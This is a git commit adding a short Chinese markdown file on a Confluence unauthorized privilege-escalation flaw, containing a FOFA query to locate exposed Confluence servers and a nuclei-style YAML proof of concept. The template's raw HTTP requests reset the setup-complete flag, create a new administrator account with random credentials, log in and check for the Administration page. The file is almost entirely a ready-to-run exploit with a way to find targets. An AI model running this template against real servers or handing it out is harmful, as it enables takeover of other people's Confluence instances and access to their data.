Create Confluence 未授权提权访问漏洞.md

2025-02-27 04:39:25 +00:00 · 2023-10-18 21:05:12 +08:00 · 2023-10-18 21:05:12 +08:00 · 1bedef8f17
commit 1bedef8f17
parent 3f7968e135
1 changed files with 54 additions and 0 deletions
--- a/未授权提权访问漏洞.md
+++ b/未授权提权访问漏洞.md
@ -0,0 +1,54 @@
+## Confluence 未授权提权访问漏洞
+
+## fofa
+app="ATLASSIAN-Confluence"
+
+## poc yaml格式
+```
+variables:
+  username: "{{rand_base(10)}}"
+  password: "{{rand_base(10)}}"
+  email: "{{username}}@{{password}}"
+http:
+  - raw:
+      - |
+        GET /setup/setupadministrator-start.action HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /setup/setupadministrator-start.action HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        @timeout:20s
+        POST /setup/setupadministrator.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
+      - |
+        POST /dologin.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action
+      - |
+        GET /welcome.action HTTP/1.1
+        Host: {{Hostname}}
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_1, 'Setup is already complete')
+          - contains(body_3, 'Please configure the system administrator account for this Confluence installation')
+          - contains(location_5, '/index.action')
+          - status_code_5 == 302
+          - contains(body_6, 'Administration')
+        condition: and
+
+```
+